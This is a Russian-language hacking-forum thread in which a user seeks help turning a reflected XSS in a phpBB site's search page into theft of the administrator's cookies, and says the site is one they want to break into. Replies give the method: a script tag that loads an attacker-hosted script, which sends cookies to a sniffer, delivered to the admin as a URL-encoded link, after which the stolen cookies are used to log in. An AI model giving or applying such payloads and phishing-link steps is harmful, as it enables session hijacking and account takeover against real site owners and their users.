Xss в поиске...что дальше ?
 

Здрасте :)
Извините если ни там запостил тему,,,,нужна помошь ачатовцев :)

Вобщем есть сайт, там поиск, там есть XSS (активная вроде))

вобщем если в поиске ввести

"><script>alert('antichat.ru')</script>

и нажать НАЙТИ,,,,то вылезает окошко с надписью античат...
(тестировал в опере и осле 7)

Теперь вопрос:

Как получить куки пользователей если ксс в поиске :confused:
Это вообще реально ?

Спасибо :)

Это посевная хсс а не активная .

Тоесть если я напишу админу письмо:

Привет
у тебя поиск не работает ( =

Он зайдет в поиск...и как мне его куки своровать ?

Я толко этого не пойму...

http://forum.antichat.ru/thread20140.html

Суй в линк снифер, шифруй, и суй линк зверю которого хочешь поиметь, смотри снифер, ставь куки, властвуй.

k0lbasa
Да я эту тему наизусть тебе могу рассказать ( =

Тоесть если у меня будет сайт:

мой_сайт.ру/xss.htm

в xss.htm код
Я кидаю ссылку админу в ЛС тип зайди на этот сайт....он заходит и его куки у меня :confused:

Разве такое сработает ?

Ссылку ядовитую надо ему подсунуть где в урле чето типа того
"><script scr=http://xxx.ru/script.js></script>
где script.js шлет куки на снифер

это пассивная
хэк

Как же такое сделать если ксс толко в поиске есть :(

Тоесть Xss, которую я в поиске нашёл...она вообще не нужна ?

Если что-то в поиске искать, выводится так:

www.site.com/ssearch.php?q=antichat.ru

Когда чеовек получает сообщение с такой ссылкой,,,,вот что появляется
http://i002.radikal.ru/0806/be/ff8796c81343.jpg

закодируй ссылку в urlencode

Закодировал...вставил в сообщение,,отослал:::вот что вылезает у получателя

http://i002.radikal.ru/0806/d4/e6bed52b0a6a.png

Значит xss в поиске использовать нельзя :(

убрал...
http://i019.radikal.ru/0806/16/f0931c51f289.jpg
------------------------------------------------------------------------------------------------------------------
Я просканил этот сайт спайдером...вот он мне выдал
http://i014.radikal.ru/0806/38/6ce2dab5f776.jpg

Когда подставляю эти значения (в опере) и захожу на сайт....ни чего нет, я не авторизирован//


Это форум phpBB 2.0.17,,,,только не посылайте в тему phpBB ни один эксплойт не работает и ксс тоже в сообщениях не пашет...вот только в поиске и работает :(
З.Ы. там где точки я затёр пару символов))))

1) Залей скрипт, ворующий куки.
2) Потом закодируй УРЛ ?search="><script scr=http://xxx.ru/script.js></script>
например вот так:
3) Отсылай ссылку одмину

diehard
ОГРОМНОЕ спасибо за помошь...

Но я не совсем понял....я на ВЫ с PHP....

1) Скрипт лежит на сайте www.xxx.ru/js.js
2) (ssearch.php всё правильно, там 2 s)

Вот тут не совсем понял....как закодировать ???

URL Encode ???
----------------------------------------------------------------------
Что это за код и куда его "пихать" :confused:

Ещё раз извините за возможно идиотские вопросы....прошу, только ответте :(

Этот код сохрани в 1.php и запусти под сервером, хоть на локалхосте: http://localhost/1.php?a=search="><script scr=http://xxx.ru/js.js></script>
В результате получится УРЛ вроде:

Выходит вот что...

Теперь нужно это подставлять к поиску на site.ru (который хочу взломать)

или что-то опять не так делаю ??? :(

ОМГ, теперь нажми ENTER
И исправь ошибку, не "scr=", а "src="

В общем вот что в итоге получается (сколько я не клацкал)) на интер)

Получившуюся ссылку засовую в сообщение и отсылаю:
(вот эту ссылку)

Может переадресацию нужно сделать какнить на мой js.js

Если на неё нажать,,,попадаю сюда:

------------------------------------------------------------------------

Снифер пустой,,,,может из за кода js.js

Я в нём вот что пишу,,,но помойму не работает он вовсе)):

Может вот так сделать:

----------------------------------------------------------------------
не перенаправляет так...

ОМФГ! Лучше просто забей на это дело

-Хочешь спать спокойно, лучше не начинай.

Этого я уж точно не сделаю....

Мб если ты не можешь простейшего(утащить куки) не стоит в это ввязыватся?(советую перечитать мануал по xss)